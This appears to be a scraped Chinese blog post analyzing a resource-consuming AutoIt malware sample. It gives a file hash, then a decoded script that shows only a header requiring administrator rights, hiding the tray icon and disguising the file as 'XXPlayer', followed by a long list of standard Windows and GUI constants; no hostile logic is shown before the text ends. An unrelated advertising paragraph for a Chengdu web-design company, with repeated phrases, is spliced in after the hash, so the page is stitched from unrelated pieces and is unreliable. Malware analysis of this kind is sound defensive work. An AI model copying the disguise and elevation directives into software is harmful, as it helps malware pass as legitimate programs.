一个Autoit恶意资源消耗样本

文件md5:b1c05acd8cbbf1bd9a2448da0c10c411

公司主营业务:成都网站建设、网站设计、移动网站开发等业务。帮助企业客户真正实现互联网宣传,提高企业的竞争能力。成都创新互联公司是一支青春激扬、勤奋敬业、活力青春激扬、勤奋敬业、活力澎湃、和谐高效的团队。公司秉承以“开放、自由、严谨、自律”为核心的企业文化,感谢他们对我们的高要求,感谢他们从不同领域给我们带来的挑战,让我们激情的团队有机会用头脑与智慧不断的给客户带来惊喜。成都创新互联公司推出昌邑免费做网站回馈大家。

中毒迹象

一个Autoit恶意资源消耗样本
基本信息获取
一个Autoit恶意资源消耗样本

基本PE信息
一个Autoit恶意资源消耗样本

解码后脚本为:

//2017-12-1 22:43
#NoTrayIcon
#RequireAdmin
#Region
#AutoIt3Wrapper_icon=C:\Windows\system32\SHELL32.dll|-138
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Res_Comment=XXPlayer
#AutoIt3Wrapper_Res_Description=XXPlayer
#AutoIt3Wrapper_Res_Fileversion=2.2.3.3
#AutoIt3Wrapper_Res_LegalCopyright=XXPlayer
#EndRegion
GLOBAL CONST $GUI_EVENT_CLOSE = - 3
GLOBAL CONST $GUI_EVENT_MINIMIZE = - 4
GLOBAL CONST $GUI_EVENT_RESTORE = - 5
GLOBAL CONST $GUI_EVENT_MAXIMIZE = - 6
GLOBAL CONST $GUI_EVENT_PRIMARYDOWN = - 7
GLOBAL CONST $GUI_EVENT_PRIMARYUP = - 8
GLOBAL CONST $GUI_EVENT_SECONDARYDOWN = - 9
GLOBAL CONST $GUI_EVENT_SECONDARYUP = - 10
GLOBAL CONST $GUI_EVENT_MOUSEMOVE = - 11
GLOBAL CONST $GUI_EVENT_RESIZED = - 12
GLOBAL CONST $GUI_EVENT_DROPPED = - 13
GLOBAL CONST $GUI_RUNDEFMSG = "GUI_RUNDEFMSG"
GLOBAL CONST $GUI_AVISTOP = 0
GLOBAL CONST $GUI_AVISTART = 1
GLOBAL CONST $GUI_AVICLOSE = 2
GLOBAL CONST $GUI_CHECKED = 1
GLOBAL CONST $GUI_INDETERMINATE = 2
GLOBAL CONST $GUI_UNCHECKED = 4
GLOBAL CONST $GUI_DROPACCEPTED = 8
GLOBAL CONST $GUI_NODROPACCEPTED = 4096
GLOBAL CONST $GUI_ACCEPTFILES = $GUI_DROPACCEPTED
GLOBAL CONST $GUI_SHOW = 16
GLOBAL CONST $GUI_HIDE = 32
GLOBAL CONST $GUI_ENABLE = 64
GLOBAL CONST $GUI_DISABLE = 128
GLOBAL CONST $GUI_FOCUS = 256
GLOBAL CONST $GUI_NOFOCUS = 8192
GLOBAL CONST $GUI_DEFBUTTON = 512
GLOBAL CONST $GUI_EXPAND = 1024
GLOBAL CONST $GUI_ONTOP = 2048
GLOBAL CONST $GUI_FONTITALIC = 2
GLOBAL CONST $GUI_FONTUNDER = 4
GLOBAL CONST $GUI_FONTSTRIKE = 8
GLOBAL CONST $GUI_DOCKAUTO = 1
GLOBAL CONST $GUI_DOCKLEFT = 2
GLOBAL CONST $GUI_DOCKRIGHT = 4
GLOBAL CONST $GUI_DOCKHCENTER = 8
GLOBAL CONST $GUI_DOCKTOP = 32
GLOBAL CONST $GUI_DOCKBOTTOM = 64
GLOBAL CONST $GUI_DOCKVCENTER = 128
GLOBAL CONST $GUI_DOCKWIDTH = 256
GLOBAL CONST $GUI_DOCKHEIGHT = 512
GLOBAL CONST $GUI_DOCKSIZE = 768
GLOBAL CONST $GUI_DOCKMENUBAR = 544
GLOBAL CONST $GUI_DOCKSTATEBAR = 576
GLOBAL CONST $GUI_DOCKALL = 802
GLOBAL CONST $GUI_DOCKBORDERS = 102
GLOBAL CONST $GUI_GR_CLOSE = 1
GLOBAL CONST $GUI_GR_LINE = 2
GLOBAL CONST $GUI_GR_BEZIER = 4
GLOBAL CONST $GUI_GR_MOVE = 6
GLOBAL CONST $GUI_GR_COLOR = 8
GLOBAL CONST $GUI_GR_RECT = 10
GLOBAL CONST $GUI_GR_ELLIPSE = 12
GLOBAL CONST $GUI_GR_PIE = 14
GLOBAL CONST $GUI_GR_DOT = 16
GLOBAL CONST $GUI_GR_PIXEL = 18
GLOBAL CONST $GUI_GR_HINT = 20
GLOBAL CONST $GUI_GR_REFRESH = 22
GLOBAL CONST $GUI_GR_PENSIZE = 24
GLOBAL CONST $GUI_GR_NOBKCOLOR = - 2
GLOBAL CONST $GUI_BKCOLOR_DEFAULT = - 1
GLOBAL CONST $GUI_BKCOLOR_TRANSPARENT = - 2
GLOBAL CONST $GUI_BKCOLOR_LV_ALTERNATE = -33554432
GLOBAL CONST $GUI_WS_EX_PARENTDRAG = 1048576
GLOBAL CONST $WS_TILED = 0
GLOBAL CONST $WS_OVERLAPPED = 0
GLOBAL CONST $WS_MAXIMIZEBOX = 65536
GLOBAL CONST $WS_MINIMIZEBOX = 131072
GLOBAL CONST $WS_TABSTOP = 65536
GLOBAL CONST $WS_GROUP = 131072
GLOBAL CONST $WS_SIZEBOX = 262144
GLOBAL CONST $WS_THICKFRAME = 262144
GLOBAL CONST $WS_SYSMENU = 524288
GLOBAL CONST $WS_HSCROLL = 1048576
GLOBAL CONST $WS_VSCROLL = 2097152
GLOBAL CONST $WS_DLGFRAME = 4194304
GLOBAL CONST $WS_BORDER = 8388608
GLOBAL CONST $WS_CAPTION = 12582912
GLOBAL CONST $WS_OVERLAPPEDWINDOW = 13565952
GLOBAL CONST $WS_TILEDWINDOW = 13565952
GLOBAL CONST $WS_MAXIMIZE = 16777216
GLOBAL CONST $WS_CLIPCHILDREN = 33554432
GLOBAL CONST $WS_CLIPSIBLINGS = 67108864
GLOBAL CONST $WS_DISABLED = 134217728
GLOBAL CONST $WS_VISIBLE = 268435456
GLOBAL CONST $WS_MINIMIZE = 536870912
GLOBAL CONST $WS_CHILD = 1073741824
GLOBAL CONST $WS_POPUP = -2147483648
GLOBAL CONST $WS_POPUPWINDOW = -2138570752
GLOBAL CONST $DS_MODALFRAME = 128
GLOBAL CONST $DS_SETFOREGROUND = 512
GLOBAL CONST $DS_CONTEXTHELP = 8192
GLOBAL CONST $WS_EX_ACCEPTFILES = 16
GLOBAL CONST $WS_EX_MDICHILD = 64
GLOBAL CONST $WS_EX_APPWINDOW = 262144
GLOBAL CONST $WS_EX_COMPOSITED = 33554432
GLOBAL CONST $WS_EX_CLIENTEDGE = 512
GLOBAL CONST $WS_EX_CONTEXTHELP = 1024
GLOBAL CONST $WS_EX_DLGMODALFRAME = 1
GLOBAL CONST $WS_EX_LEFTSCROLLBAR = 16384
GLOBAL CONST $WS_EX_OVERLAPPEDWINDOW = 768
GLOBAL CONST $WS_EX_RIGHT = 4096
GLOBAL CONST $WS_EX_STATICEDGE = 131072
GLOBAL CONST $WS_EX_TOOLWINDOW = 128
GLOBAL CONST $WS_EX_TOPMOST = 8
GLOBAL CONST $WS_EX_TRANSPARENT = 32
GLOBAL CONST $WS_EX_WINDOWEDGE = 256
GLOBAL CONST $WS_EX_LAYERED = 524288
GLOBAL CONST $WS_EX_CONTROLPARENT = 65536
GLOBAL CONST $WS_EX_LAYOUTRTL = 4194304
GLOBAL CONST $WS_EX_RTLREADING = 8192
GLOBAL CONST $WM_GETTEXTLENGTH = 14
GLOBAL CONST $WM_GETTEXT = 13
GLOBAL CONST $WM_SIZE = 5
GLOBAL CONST $WM_SIZING = 532
GLOBAL CONST $WM_USER = 1024
GLOBAL CONST $WM_CREATE = 1
GLOBAL CONST $WM_DESTROY = 2
GLOBAL CONST $WM_MOVE = 3
GLOBAL CONST $WM_ACTIVATE = 6
GLOBAL CONST $WM_SETFOCUS = 7
GLOBAL CONST $WM_KILLFOCUS = 8
GLOBAL CONST $WM_ENABLE = 10
GLOBAL CONST $WM_SETREDRAW = 11
GLOBAL CONST $WM_SETTEXT = 12
GLOBAL CONST $WM_PAINT = 15
GLOBAL CONST $WM_CLOSE = 16
GLOBAL CONST $WM_QUIT = 18
GLOBAL CONST $WM_ERASEBKGND = 20
GLOBAL CONST $WM_SYSCOLORCHANGE = 21
GLOBAL CONST $WM_SHOWWINDOW = 24
GLOBAL CONST $WM_WININICHANGE = 26
GLOBAL CONST $WM_DEVMODECHANGE = 27
GLOBAL CONST $WM_ACTIVATEAPP = 28
GLOBAL CONST $WM_FONTCHANGE = 29
GLOBAL CONST $WM_TIMECHANGE = 30
GLOBAL CONST $WM_CANCELMODE = 31
GLOBAL CONST $WM_SETCURSOR = 32
GLOBAL CONST $WM_MOUSEACTIVATE = 33
GLOBAL CONST $WM_CHILDACTIVATE = 34
GLOBAL CONST $WM_QUEUESYNC = 35
GLOBAL CONST $WM_GETMINMAXINFO = 36
GLOBAL CONST $WM_PAINTICON = 38
GLOBAL CONST $WM_ICONERASEBKGND = 39
GLOBAL CONST $WM_NEXTDLGCTL = 40
GLOBAL CONST $WM_SPOOLERSTATUS = 42
GLOBAL CONST $WM_DRAWITEM = 43
GLOBAL CONST $WM_MEASUREITEM = 44
GLOBAL CONST $WM_DELETEITEM = 45
GLOBAL CONST $WM_VKEYTOITEM = 46
GLOBAL CONST $WM_CHARTOITEM = 47
GLOBAL CONST $WM_SETFONT = 48
GLOBAL CONST $WM_GETFONT = 49
GLOBAL CONST $WM_SETHOTKEY = 50
GLOBAL CONST $WM_GETHOTKEY = 51
GLOBAL CONST $WM_QUERYDRAGICON = 55
GLOBAL CONST $WM_COMPAREITEM = 57
GLOBAL CONST $WM_GETOBJECT = 61
GLOBAL CONST $WM_COMPACTING = 65
GLOBAL CONST $WM_COMMNOTIFY = 68
GLOBAL CONST $WM_WINDOWPOSCHANGING = 70
GLOBAL CONST $WM_WINDOWPOSCHANGED = 71
GLOBAL CONST $WM_POWER = 72
GLOBAL CONST $WM_NOTIFY = 78
GLOBAL CONST $WM_COPYDATA = 74
GLOBAL CONST $WM_CANCELJOURNAL = 75
GLOBAL CONST $WM_INPUTLANGCHANGEREQUEST = 80
GLOBAL CONST $WM_INPUTLANGCHANGE = 81
GLOBAL CONST $WM_TCARD = 82
GLOBAL CONST $WM_HELP = 83
GLOBAL CONST $WM_USERCHANGED = 84
GLOBAL CONST $WM_NOTIFYFORMAT = 85
GLOBAL CONST $WM_CUT = 768
GLOBAL CONST $WM_COPY = 769
GLOBAL CONST $WM_PASTE = 770
GLOBAL CONST $WM_CLEAR = 771
GLOBAL CONST $WM_UNDO = 772
GLOBAL CONST $WM_CONTEXTMENU = 123
GLOBAL CONST $WM_STYLECHANGING = 124
GLOBAL CONST $WM_STYLECHANGED = 125
GLOBAL CONST $WM_DISPLAYCHANGE = 126
GLOBAL CONST $WM_GETICON = 127
GLOBAL CONST $WM_SETICON = 128
GLOBAL CONST $WM_NCCREATE = 129
GLOBAL CONST $WM_NCDESTROY = 130
GLOBAL CONST $WM_NCCALCSIZE = 131
GLOBAL CONST $WM_NCHITTEST = 132
GLOBAL CONST $WM_NCPAINT = 133
GLOBAL CONST $WM_NCACTIVATE = 134
GLOBAL CONST $WM_GETDLGCODE = 135
GLOBAL CONST $WM_SYNCPAINT = 136
GLOBAL CONST $WM_NCMOUSEMOVE = 160
GLOBAL CONST $WM_NCLBUTTONDOWN = 161
GLOBAL CONST $WM_NCLBUTTONUP = 162
GLOBAL CONST $WM_NCLBUTTONDBLCLK = 163
GLOBAL CONST $WM_NCRBUTTONDOWN = 164
GLOBAL CONST $WM_NCRBUTTONUP = 165
GLOBAL CONST $WM_NCRBUTTONDBLCLK = 166
GLOBAL CONST $WM_NCMBUTTONDOWN = 167
GLOBAL CONST $WM_NCMBUTTONUP = 168
GLOBAL CONST $WM_NCMBUTTONDBLCLK = 169
GLOBAL CONST $WM_KEYDOWN = 256
GLOBAL CONST $WM_KEYUP = 257
GLOBAL CONST $WM_CHAR = 258
GLOBAL CONST $WM_DEADCHAR = 259
GLOBAL CONST $WM_SYSKEYDOWN = 260
GLOBAL CONST $WM_SYSKEYUP = 261
GLOBAL CONST $WM_SYSCHAR = 262
GLOBAL CONST $WM_SYSDEADCHAR = 263
GLOBAL CONST $WM_INITDIALOG = 272
GLOBAL CONST $WM_COMMAND = 273
GLOBAL CONST $WM_SYSCOMMAND = 274
GLOBAL CONST $WM_TIMER = 275
GLOBAL CONST $WM_HSCROLL = 276
GLOBAL CONST $WM_VSCROLL = 277
GLOBAL CONST $WM_INITMENU = 278
GLOBAL CONST $WM_INITMENUPOPUP = 279
GLOBAL CONST $WM_MENUSELECT = 287
GLOBAL CONST $WM_MENUCHAR = 288
GLOBAL CONST $WM_ENTERIDLE = 289
GLOBAL CONST $WM_MENURBUTTONUP = 290
GLOBAL CONST $WM_MENUDRAG = 291
GLOBAL CONST $WM_MENUGETOBJECT = 292
GLOBAL CONST $WM_UNINITMENUPOPUP = 293
GLOBAL CONST $WM_MENUCOMMAND = 294
GLOBAL CONST $WM_CHANGEUISTATE = 295
GLOBAL CONST $WM_UPDATEUISTATE = 296
GLOBAL CONST $WM_QUERYUISTATE = 297
GLOBAL CONST $WM_CTLCOLORMSGBOX = 306
GLOBAL CONST $WM_CTLCOLOREDIT = 307
GLOBAL CONST $WM_CTLCOLORLISTBOX = 308
GLOBAL CONST $WM_CTLCOLORBTN = 309
GLOBAL CONST $WM_CTLCOLORDLG = 310
GLOBAL CONST $WM_CTLCOLORSCROLLBAR = 311
GLOBAL CONST $WM_CTLCOLORSTATIC = 312
GLOBAL CONST $WM_CTLCOLOR = 25
GLOBAL CONST $MN_GETHMENU = 481
GLOBAL CONST $NM_FIRST = 0
GLOBAL CONST $NM_OUTOFMEMORY = $NM_FIRST - 1
GLOBAL CONST $NM_CLICK = $NM_FIRST - 2
GLOBAL CONST $NM_DBLCLK = $NM_FIRST - 3
GLOBAL CONST $NM_RETURN = $NM_FIRST - 4
GLOBAL CONST $NM_RCLICK = $NM_FIRST - 5
GLOBAL CONST $NM_RDBLCLK = $NM_FIRST - 6
GLOBAL CONST $NM_SETFOCUS = $NM_FIRST - 7
GLOBAL CONST $NM_KILLFOCUS = $NM_FIRST - 8
GLOBAL CONST $NM_CUSTOMDRAW = $NM_FIRST - 12
GLOBAL CONST $NM_HOVER = $NM_FIRST - 13
GLOBAL CONST $NM_NCHITTEST = $NM_FIRST - 14
GLOBAL CONST $NM_KEYDOWN = $NM_FIRST - 15
GLOBAL CONST $NM_RELEASEDCAPTURE = $NM_FIRST - 16
GLOBAL CONST $NM_SETCURSOR = $NM_FIRST - 17
GLOBAL CONST $NM_CHAR = $NM_FIRST - 18
GLOBAL CONST $NM_TOOLTIPSCREATED = $NM_FIRST - 19
GLOBAL CONST $NM_LDOWN = $NM_FIRST - 20
GLOBAL CONST $NM_RDOWN = $NM_FIRST - 21
GLOBAL CONST $NM_THEMECHANGED = $NM_FIRST - 22
GLOBAL CONST $WM_MOUSEMOVE = 512
GLOBAL CONST $WM_LBUTTONDOWN = 513
GLOBAL CONST $WM_LBUTTONUP = 514
GLOBAL CONST $WM_LBUTTONDBLCLK = 515
GLOBAL CONST $WM_RBUTTONDOWN = 516
GLOBAL CONST $WM_RBUTTONUP = 517
GLOBAL CONST $WM_RBUTTONDBLCK = 518
GLOBAL CONST $WM_MBUTTONDOWN = 519
GLOBAL CONST $WM_MBUTTONUP = 520
GLOBAL CONST $WM_MBUTTONDBLCK = 521
GLOBAL CONST $WM_MOUSEWHEEL = 522
GLOBAL CONST $WM_XBUTTONDOWN = 523
GLOBAL CONST $WM_XBUTTONUP = 524
GLOBAL CONST $WM_XBUTTONDBLCLK = 525
GLOBAL CONST $WM_MOUSEHWHEEL = 526
GLOBAL CONST $PS_SOLID = 0
GLOBAL CONST $PS_DASH = 1
GLOBAL CONST $PS_DOT = 2
GLOBAL CONST $PS_DASHDOT = 3
GLOBAL CONST $PS_DASHDOTDOT = 4
GLOBAL CONST $PS_NULL = 5
GLOBAL CONST $PS_INSIDEFRAME = 6
GLOBAL CONST $LWA_ALPHA = 2
GLOBAL CONST $LWA_COLORKEY = 1
GLOBAL CONST $RGN_AND = 1
GLOBAL CONST $RGN_OR = 2
GLOBAL CONST $RGN_XOR = 3
GLOBAL CONST $RGN_DIFF = 4
GLOBAL CONST $RGN_COPY = 5
GLOBAL CONST $ERRORREGION = 0
GLOBAL CONST $NULLREGION = 1
GLOBAL CONST $SIMPLEREGION = 2
GLOBAL CONST $COMPLEXREGION = 3
GLOBAL CONST $TRANSPARENT = 1
GLOBAL CONST $OPAQUE = 2
GLOBAL CONST $CCM_FIRST = 8192
GLOBAL CONST $CCM_GETUNICODEFORMAT = ( $CCM_FIRST + 6 )
GLOBAL CONST $CCM_SETUNICODEFORMAT = ( $CCM_FIRST + 5 )
GLOBAL CONST $CCM_SETBKCOLOR = $CCM_FIRST + 1
GLOBAL CONST $CCM_SETCOLORSCHEME = $CCM_FIRST + 2
GLOBAL CONST $CCM_GETCOLORSCHEME = $CCM_FIRST + 3
GLOBAL CONST $CCM_GETDROPTARGET = $CCM_FIRST + 4
GLOBAL CONST $CCM_SETWINDOWTHEME = $CCM_FIRST + 11
GLOBAL CONST $GA_PARENT = 1
GLOBAL CONST $GA_ROOT = 2
GLOBAL CONST $GA_ROOTOWNER = 3
GLOBAL CONST $SM_CXSCREEN = 0
GLOBAL CONST $SM_CYSCREEN = 1
GLOBAL CONST $SM_CXVSCROLL = 2
GLOBAL CONST $SM_CYHSCROLL = 3
GLOBAL CONST $SM_CYCAPTION = 4
GLOBAL CONST $SM_CXBORDER = 5
GLOBAL CONST $SM_CYBORDER = 6
GLOBAL CONST $SM_CXDLGFRAME = 7
GLOBAL CONST $SM_CYDLGFRAME = 8
GLOBAL CONST $SM_CYVTHUMB = 9
GLOBAL CONST $SM_CXHTHUMB = 10
GLOBAL CONST $SM_CXICON = 11
GLOBAL CONST $SM_CYICON = 12
GLOBAL CONST $SM_CXCURSOR = 13
GLOBAL CONST $SM_CYCURSOR = 14
GLOBAL CONST $SM_CYMENU = 15
GLOBAL CONST $SM_CXFULLSCREEN = 16
GLOBAL CONST $SM_CYFULLSCREEN = 17
GLOBAL CONST $SM_CYKANJIWINDOW = 18
GLOBAL CONST $SM_MOUSEPRESENT = 19
GLOBAL CONST $SM_CYVSCROLL = 20
GLOBAL CONST $SM_CXHSCROLL = 21
GLOBAL CONST $SM_DEBUG = 22
GLOBAL CONST $SM_SWAPBUTTON = 23
GLOBAL CONST $SM_RESERVED1 = 24
GLOBAL CONST $SM_RESERVED2 = 25
GLOBAL CONST $SM_RESERVED3 = 26
GLOBAL CONST $SM_RESERVED4 = 27
GLOBAL CONST $SM_CXMIN = 28
GLOBAL CONST $SM_CYMIN = 29
GLOBAL CONST $SM_CXSIZE = 30
GLOBAL CONST $SM_CYSIZE = 31
GLOBAL CONST $SM_CXFRAME = 32
GLOBAL CONST $SM_CYFRAME = 33
GLOBAL CONST $SM_CXMINTRACK = 34
GLOBAL CONST $SM_CYMINTRACK = 35
GLOBAL CONST $SM_CXDOUBLECLK = 36
GLOBAL CONST $SM_CYDOUBLECLK = 37
GLOBAL CONST $SM_CXICONSPACING = 38
GLOBAL CONST $SM_CYICONSPACING = 39
GLOBAL CONST $SM_MENUDROPALIGNMENT = 40
GLOBAL CONST $SM_PENWINDOWS = 41
GLOBAL CONST $SM_DBCSENABLED = 42
GLOBAL CONST $SM_CMOUSEBUTTONS = 43
GLOBAL CONST $SM_SECURE = 44
GLOBAL CONST $SM_CXEDGE = 45
GLOBAL CONST $SM_CYEDGE = 46
GLOBAL CONST $SM_CXMINSPACING = 47
GLOBAL CONST $SM_CYMINSPACING = 48
GLOBAL CONST $SM_CXSMICON = 49
GLOBAL CONST $SM_CYSMICON = 50
GLOBAL CONST $SM_CYSMCAPTION = 51
GLOBAL CONST $SM_CXSMSIZE = 52
GLOBAL CONST $SM_CYSMSIZE = 53
GLOBAL CONST $SM_CXMENUSIZE = 54
GLOBAL CONST $SM_CYMENUSIZE = 55
GLOBAL CONST $SM_ARRANGE = 56
GLOBAL CONST $SM_CXMINIMIZED = 57
GLOBAL CONST $SM_CYMINIMIZED = 58
GLOBAL CONST $SM_CXMAXTRACK = 59
GLOBAL CONST $SM_CYMAXTRACK = 60
GLOBAL CONST $SM_CXMAXIMIZED = 61
GLOBAL CONST $SM_CYMAXIMIZED = 62
GLOBAL CONST $SM_NETWORK = 63
GLOBAL CONST $SM_CLEANBOOT = 67
GLOBAL CONST $SM_CXDRAG = 68
GLOBAL CONST $SM_CYDRAG = 69
GLOBAL CONST $SM_SHOWSOUNDS = 70
GLOBAL CONST $SM_CXMENUCHECK = 71
GLOBAL CONST $SM_CYMENUCHECK = 72
GLOBAL CONST $SM_SLOWMACHINE = 73
GLOBAL CONST $SM_MIDEASTENABLED = 74
GLOBAL CONST $SM_MOUSEWHEELPRESENT = 75
GLOBAL CONST $SM_XVIRTUALSCREEN = 76
GLOBAL CONST $SM_YVIRTUALSCREEN = 77
GLOBAL CONST $SM_CXVIRTUALSCREEN = 78
GLOBAL CONST $SM_CYVIRTUALSCREEN = 79
GLOBAL CONST $SM_CMONITORS = 80
GLOBAL CONST $SM_SAMEDISPLAYFORMAT = 81
GLOBAL CONST $SM_IMMENABLED = 82
GLOBAL CONST $SM_CXFOCUSBORDER = 83
GLOBAL CONST $SM_CYFOCUSBORDER = 84
GLOBAL CONST $SM_TABLETPC = 86
GLOBAL CONST $SM_MEDIACENTER = 87
GLOBAL CONST $SM_STARTER = 88
GLOBAL CONST $SM_SERVERR2 = 89
GLOBAL CONST $SM_CMETRICS = 90
GLOBAL CONST $SM_REMOTESESSION = 4096
GLOBAL CONST $SM_SHUTTINGDOWN = 8192
GLOBAL CONST $SM_REMOTECONTROL = 8193
GLOBAL CONST $SM_CARETBLINKINGENABLED = 8194
GLOBAL CONST $BLACKNESS = 66
GLOBAL CONST $CAPTUREBLT = 1073741824
GLOBAL CONST $DSTINVERT = 5570569
GLOBAL CONST $MERGECOPY = 12583114
GLOBAL CONST $MERGEPAINT = 12255782
GLOBAL CONST $NOMIRRORBITMAP = -2147483648
GLOBAL CONST $NOTSRCCOPY = 3342344
GLOBAL CONST $NOTSRCERASE = 1114278
GLOBAL CONST $PATCOPY = 15728673
GLOBAL CONST $PATINVERT = 5898313
GLOBAL CONST $PATPAINT = 16452105
GLOBAL CONST $SRCAND = 8913094
GLOBAL CONST $SRCCOPY = 13369376
GLOBAL CONST $SRCERASE = 4457256
GLOBAL CONST $SRCINVERT = 6684742
GLOBAL CONST $SRCPAINT = 15597702
GLOBAL CONST $WHITENESS = 16711778
GLOBAL CONST $DT_BOTTOM = 8
GLOBAL CONST $DT_CALCRECT = 1024
GLOBAL CONST $DT_CENTER = 1
GLOBAL CONST $DT_EDITCONTROL = 8192
GLOBAL CONST $DT_END_ELLIPSIS = 32768
GLOBAL CONST $DT_EXPANDTABS = 64
GLOBAL CONST $DT_EXTERNALLEADING = 512
GLOBAL CONST $DT_HIDEPREFIX = 1048576
GLOBAL CONST $DT_INTERNAL = 4096
GLOBAL CONST $DT_LEFT = 0
GLOBAL CONST $DT_MODIFYSTRING = 65536
GLOBAL CONST $DT_NOCLIP = 256
GLOBAL CONST $DT_NOFULLWIDTHCHARBREAK = 524288
GLOBAL CONST $DT_NOPREFIX = 2048
GLOBAL CONST $DT_PATH_ELLIPSIS = 16384
GLOBAL CONST $DT_PREFIXONLY = 2097152
GLOBAL CONST $DT_RIGHT = 2
GLOBAL CONST $DT_RTLREADING = 131072
GLOBAL CONST $DT_SINGLELINE = 32
GLOBAL CONST $DT_TABSTOP = 128
GLOBAL CONST $DT_TOP = 0
GLOBAL CONST $DT_VCENTER = 4
GLOBAL CONST $DT_WORDBREAK = 16
GLOBAL CONST $DT_WORD_ELLIPSIS = 262144
GLOBAL CONST $RDW_ERASE = 4
GLOBAL CONST $RDW_FRAME = 1024
GLOBAL CONST $RDW_INTERNALPAINT = 2
GLOBAL CONST $RDW_INVALIDATE = 1
GLOBAL CONST $RDW_NOERASE = 32
GLOBAL CONST $RDW_NOFRAME = 2048
GLOBAL CONST $RDW_NOINTERNALPAINT = 16
GLOBAL CONST $RDW_VALIDATE = 8
GLOBAL CONST $RDW_ERASENOW = 512
GLOBAL CONST $RDW_UPDATENOW = 256
GLOBAL CONST $RDW_ALLCHILDREN = 128
GLOBAL CONST $RDW_NOCHILDREN = 64
GLOBAL CONST $WM_RENDERFORMAT = 773
GLOBAL CONST $WM_RENDERALLFORMATS = 774
GLOBAL CONST $WM_DESTROYCLIPBOARD = 775
GLOBAL CONST $WM_DRAWCLIPBOARD = 776
GLOBAL CONST $WM_PAINTCLIPBOARD = 777
GLOBAL CONST $WM_VSCROLLCLIPBOARD = 778
GLOBAL CONST $WM_SIZECLIPBOARD = 779
GLOBAL CONST $WM_ASKCBFORMATNAME = 780
GLOBAL CONST $WM_CHANGECBCHAIN = 781
GLOBAL CONST $WM_HSCROLLCLIPBOARD = 782
GLOBAL CONST $HTERROR = - 2
GLOBAL CONST $HTTRANSPARENT = - 1
GLOBAL CONST $HTNOWHERE = 0
GLOBAL CONST $HTCLIENT = 1
GLOBAL CONST $HTCAPTION = 2
GLOBAL CONST $HTSYSMENU = 3
GLOBAL CONST $HTGROWBOX = 4
GLOBAL CONST $HTSIZE = $HTGROWBOX
GLOBAL CONST $HTMENU = 5
GLOBAL CONST $HTHSCROLL = 6
GLOBAL CONST $HTVSCROLL = 7
GLOBAL CONST $HTMINBUTTON = 8
GLOBAL CONST $HTMAXBUTTON = 9
GLOBAL CONST $HTLEFT = 10
GLOBAL CONST $HTRIGHT = 11
GLOBAL CONST $HTTOP = 12
GLOBAL CONST $HTTOPLEFT = 13
GLOBAL CONST $HTTOPRIGHT = 14
GLOBAL CONST $HTBOTTOM = 15
GLOBAL CONST $HTBOTTOMLEFT = 16
GLOBAL CONST $HTBOTTOMRIGHT = 17
GLOBAL CONST $HTBORDER = 18
GLOBAL CONST $HTREDUCE = $HTMINBUTTON
GLOBAL CONST $HTZOOM = $HTMAXBUTTON
GLOBAL CONST $HTSIZEFIRST = $HTLEFT
GLOBAL CONST $HTSIZELAST = $HTBOTTOMRIGHT
GLOBAL CONST $HTOBJECT = 19
GLOBAL CONST $HTCLOSE = 20
GLOBAL CONST $HTHELP = 21
GLOBAL CONST $COLOR_SCROLLBAR = 0
GLOBAL CONST $COLOR_BACKGROUND = 1
GLOBAL CONST $COLOR_ACTIVECAPTION = 2
GLOBAL CONST $COLOR_INACTIVECAPTION = 3
GLOBAL CONST $COLOR_MENU = 4
GLOBAL CONST $COLOR_WINDOW = 5
GLOBAL CONST $COLOR_WINDOWFRAME = 6
GLOBAL CONST $COLOR_MENUTEXT = 7
GLOBAL CONST $COLOR_WINDOWTEXT = 8
GLOBAL CONST $COLOR_CAPTIONTEXT = 9
GLOBAL CONST $COLOR_ACTIVEBORDER = 10
GLOBAL CONST $COLOR_INACTIVEBORDER = 11
GLOBAL CONST $COLOR_APPWORKSPACE = 12
GLOBAL CONST $COLOR_HIGHLIGHT = 13
GLOBAL CONST $COLOR_HIGHLIGHTTEXT = 14
GLOBAL CONST $COLOR_BTNFACE = 15
GLOBAL CONST $COLOR_BTNSHADOW = 16
GLOBAL CONST $COLOR_GRAYTEXT = 17
GLOBAL CONST $COLOR_BTNTEXT = 18
GLOBAL CONST $COLOR_INACTIVECAPTIONTEXT = 19
GLOBAL CONST $COLOR_BTNHIGHLIGHT = 20
GLOBAL CONST $COLOR_3DDKSHADOW = 21
GLOBAL CONST $COLOR_3DLIGHT = 22
GLOBAL CONST $COLOR_INFOTEXT = 23
GLOBAL CONST $COLOR_INFOBK = 24
GLOBAL CONST $COLOR_HOTLIGHT = 26
GLOBAL CONST $COLOR_GRADIENTACTIVECAPTION = 27
GLOBAL CONST $COLOR_GRADIENTINACTIVECAPTION = 28
GLOBAL CONST $COLOR_MENUHILIGHT = 29
GLOBAL CONST $COLOR_MENUBAR = 30
GLOBAL CONST $COLOR_DESKTOP = 1
GLOBAL CONST $COLOR_3DFACE = 15
GLOBAL CONST $COLOR_3DSHADOW = 16
GLOBAL CONST $COLOR_3DHIGHLIGHT = 20
GLOBAL CONST $COLOR_3DHILIGHT = 20
GLOBAL CONST $COLOR_BTNHILIGHT = 20
GLOBAL CONST $HINST_COMMCTRL = - 1
GLOBAL CONST $IDB_STD_SMALL_COLOR = 0
GLOBAL CONST $IDB_STD_LARGE_COLOR = 1
GLOBAL CONST $IDB_VIEW_SMALL_COLOR = 4
GLOBAL CONST $IDB_VIEW_LARGE_COLOR = 5
GLOBAL CONST $IDB_HIST_SMALL_COLOR = 8
GLOBAL CONST $IDB_HIST_LARGE_COLOR = 9
GLOBAL CONST $STARTF_FORCEOFFFEEDBACK = 128
GLOBAL CONST $STARTF_FORCEONFEEDBACK = 64
GLOBAL CONST $STARTF_RUNFULLSCREEN = 32
GLOBAL CONST $STARTF_USECOUNTCHARS = 8
GLOBAL CONST $STARTF_USEFILLATTRIBUTE = 16
GLOBAL CONST $STARTF_USEHOTKEY = 512
GLOBAL CONST $STARTF_USEPOSITION = 4
GLOBAL CONST $STARTF_USESHOWWINDOW = 1
GLOBAL CONST $STARTF_USESIZE = 2
GLOBAL CONST $STARTF_USESTDHANDLES = 256
GLOBAL CONST $CDDS_PREPAINT = 1
GLOBAL CONST $CDDS_POSTPAINT = 2
GLOBAL CONST $CDDS_PREERASE = 3
GLOBAL CONST $CDDS_POSTERASE = 4
GLOBAL CONST $CDDS_ITEM = 65536
GLOBAL CONST $CDDS_ITEMPREPAINT = 65537
GLOBAL CONST $CDDS_ITEMPOSTPAINT = 65538
GLOBAL CONST $CDDS_ITEMPREERASE = 65539
GLOBAL CONST $CDDS_ITEMPOSTERASE = 65540
GLOBAL CONST $CDDS_SUBITEM = 131072
GLOBAL CONST $CDIS_SELECTED = 1
